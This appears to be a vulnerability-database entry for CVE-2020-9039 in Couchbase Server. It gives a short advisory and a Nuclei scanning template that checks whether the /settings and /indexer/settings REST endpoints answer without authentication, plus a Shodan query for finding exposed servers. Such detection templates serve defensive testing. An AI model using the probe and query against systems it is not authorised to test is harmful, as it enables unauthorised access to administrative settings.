Couchbase Server versions 4.0.0, 4.1.0, 4.1.1, 4.5.0, 4.5.1, 4.6.0-4.6.5, 5.0.0, 5.1.1, 5.5.0, and 5.5.1 contain insecure permissions for the projector and indexer REST endpoints caused by unauthenticated access, letting attackers access administrative APIs without authentication, exploit requires no special conditions.
PoC代码[已公开]
id: CVE-2020-9039
info:
name: Couchbase Server - Broken Access Control
author: pussycat0x
severity: critical
description: |
Couchbase Server versions 4.0.0, 4.1.0, 4.1.1, 4.5.0, 4.5.1, 4.6.0-4.6.5, 5.0.0, 5.1.1, 5.5.0, and 5.5.1 contain insecure permissions for the projector and indexer REST endpoints caused by unauthenticated access, letting attackers access administrative APIs without authentication, exploit requires no special conditions.
impact:
Attackers can access and modify administrative settings, potentially leading to data tampering or system compromise.
remediation:
Update to the latest version where the /settings REST endpoint requires authentication.
reference:
- https://docs.couchbase.com/server/current/index-rest-settings/index.html#Settings
metadata:
max-request: 2
verified: false
shodan-query: html:"Couchbase"
tags: cve,cve2020,couchbase,unauth
http:
- method: GET
path:
- "{{BaseURL}}/settings"
- "{{BaseURL}}/indexer/settings"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body, 'indexer.settings','projector.settings','max_seckey_size')"
condition: and
# digest: 4b0a00483046022100da7adbd98d63ca28f47de38fd4542da9bc32d6ca0ac75d2e05b03fa2b3cd2c11022100f007afe0c6ed9729ea6532e49b58a40a6e82707c79fe1f12952feb7ec068d5dc:922c64590222798bb761d5b6d8e72950